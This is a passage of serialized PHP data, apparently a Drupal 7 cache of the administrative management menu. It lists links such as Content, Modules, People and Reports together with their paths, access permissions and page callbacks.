settings.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:24:\"system_admin_config_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:12:\"admin/config\";s:5:\"title\";s:13:\"Configuration\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:20:\"Administer settings.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:9;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"9\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/content\";s:11:\"router_path\";s:13:\"admin/content\";s:10:\"link_title\";s:7:\"Content\";s:7:\"options\";s:82:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:32:\"Administer content and comments.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-10\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"9\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:41:\"a:1:{i:0;s:23:\"access content overview\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:36:\"a:1:{i:0;s:18:\"node_admin_content\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/content\";s:5:\"title\";s:7:\"Content\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:32:\"Administer content and comments.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:11;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"11\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:15:\"admin/dashboard\";s:11:\"router_path\";s:15:\"admin/dashboard\";s:10:\"link_title\";s:9:\"Dashboard\";s:7:\"options\";s:84:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View and customize your dashboard.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-15\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"11\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"access dashboard\";}\";s:13:\"page_callback\";s:15:\"dashboard_admin\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:15:\"admin/dashboard\";s:5:\"title\";s:9:\"Dashboard\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View and customize your dashboard.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:12;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"12\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:10:\"admin/help\";s:11:\"router_path\";s:10:\"admin/help\";s:10:\"link_title\";s:4:\"Help\";s:7:\"options\";s:98:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:48:\"Reference for usage, configuration, and modules.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"9\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"12\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:9:\"help_main\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:10:\"admin/help\";s:5:\"title\";s:4:\"Help\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:48:\"Reference for usage, configuration, and modules.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:13;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"13\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:11:\"admin/index\";s:11:\"router_path\";s:11:\"admin/index\";s:10:\"link_title\";s:5:\"Index\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-18\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"13\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:18:\"system_admin_index\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:5:\"admin\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:5:\"Index\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:16;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"16\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/modules\";s:11:\"router_path\";s:13:\"admin/modules\";s:10:\"link_title\";s:7:\"Modules\";s:7:\"options\";s:76:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:26:\"Extend site functionality.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-2\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"16\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:36:\"a:1:{i:0;s:18:\"administer modules\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:32:\"a:1:{i:0;s:14:\"system_modules\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/modules\";s:5:\"title\";s:7:\"Modules\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:26:\"Extend site functionality.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:18;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"18\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:12:\"admin/people\";s:11:\"router_path\";s:12:\"admin/people\";s:10:\"link_title\";s:6:\"People\";s:7:\"options\";s:95:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:45:\"Manage user accounts, roles, and permissions.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-4\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"18\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"administer users\";}\";s:13:\"page_callback\";s:10:\"user_admin\";s:14:\"page_arguments\";s:21:\"a:1:{i:0;s:4:\"list\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:12:\"admin/people\";s:5:\"title\";s:6:\"People\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:45:\"Manage user accounts, roles, and permissions.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:19;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"19\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/reports\";s:11:\"router_path\";s:13:\"admin/reports\";s:10:\"link_title\";s:7:\"Reports\";s:7:\"options\";s:84:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View reports, updates, and errors.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"5\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/reports\";s:5:\"title\";s:7:\"Reports\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View reports, updates, and errors.\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:13:{i:42;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"42\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:20:\"admin/reports/fields\";s:11:\"router_path\";s:20:\"admin/reports/fields\";s:10:\"link_title\";s:10:\"Field list\";s:7:\"options\";s:89:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:39:\"Overview of fields on all entity types.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:2:\"42\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:42:\"a:1:{i:0;s:24:\"administer content types\";}\";s:13:\"page_callback\";s:20:\"field_ui_fields_list\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:20:\"admin/reports/fields\";s:5:\"title\";s:10:\"Field list\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:39:\"Overview of fields on all entity types.\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:0:{}}i:50;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"50\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:19:\"admin/reports/dblog\";s:11:\"router_path\";s:19:\"admin/reports/dblog\";s:10:\"link_title\";s:19:\"Recent log messages\";s:7:\"options\";s:93:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:43:\"View events that have recently been logged.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-1\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:2:\"50\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:14:\"dblog_overview\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:19:\"admin/reports/dblog\";s:5:\"title\";s:19:\"Recent log messages\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:43:\"View events that have recently been logged.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:55;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"55\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:20:\"admin/reports/status\";s:11:\"router_path\";s:20:\"admin/reports/status\";s:10:\"link_title\";s:13:\"Status report\";s:7:\"options\";s:124:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:74:\"Get a status report about your site\'s operation and any detected problems.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-60\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:2:\"55\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:47:\"a:1:{i:0;s:29:\"administer site configuration\";}\";s:13:\"page_callback\";s:13:\"system_status\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:20:\"admin/reports/status\";s:5:\"title\";s:13:\"Status report\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:74:\"Get a status report about your site\'s operation and any detected problems.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:58;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"58\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:27:\"admin/reports/access-denied\";s:11:\"router_path\";s:27:\"admin/reports/access-denied\";s:10:\"link_title\";s:26:\"Top \'access denied\' errors\";s:7:\"options\";s:85:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:35:\"View \'access denied\' errors (403s).\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:2:\"58\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:9:\"dblog_top\";s:14:\"page_arguments\";s:31:\"a:1:{i:0;s:13:\"access denied\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:27:\"admin/reports/access-denied\";s:5:\"title\";s:26:\"Top \'access denied\' errors\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:35:\"View \'access denied\' errors (403s).\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:59;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"59\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:28:\"admin/reports/page-not-found\";s:11:\"router_path\";s:28:\"admin/reports/page-not-found\";s:10:\"link_title\";s:27:\"Top \'page not found\' errors\";s:7:\"options\";s:86:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:36:\"View \'page not found\' errors (404s).\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:2:\"59\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:9:\"dblog_top\";s:14:\"page_arguments\";s:32:\"a:1:{i:0;s:14:\"page not found\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:28:\"admin/reports/page-not-found\";s:5:\"title\";s:27:\"Top \'page not found\' errors\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:36:\"View \'page not found\' errors (404s).\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:100;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"100\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:21:\"admin/reports/event/%\";s:11:\"router_path\";s:21:\"admin/reports/event/%\";s:10:\"link_title\";s:7:\"Details\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"100\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:12:\"a:1:{i:3;N;}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:11:\"dblog_event\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:3;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:21:\"admin/reports/event/%\";s:5:\"title\";s:7:\"Details\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:192;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"192\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:20:\"admin/reports/search\";s:11:\"router_path\";s:20:\"admin/reports/search\";s:10:\"link_title\";s:18:\"Top search phrases\";s:7:\"options\";s:83:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:33:\"View most popular search phrases.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"192\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:9:\"dblog_top\";s:14:\"page_arguments\";s:23:\"a:1:{i:0;s:6:\"search\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:20:\"admin/reports/search\";s:5:\"title\";s:18:\"Top search phrases\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:33:\"View most popular search phrases.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:260;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"260\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:21:\"admin/reports/updates\";s:11:\"router_path\";s:21:\"admin/reports/updates\";s:10:\"link_title\";s:17:\"Available updates\";s:7:\"options\";s:132:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:82:\"Get a status report about available updates for your installed modules and 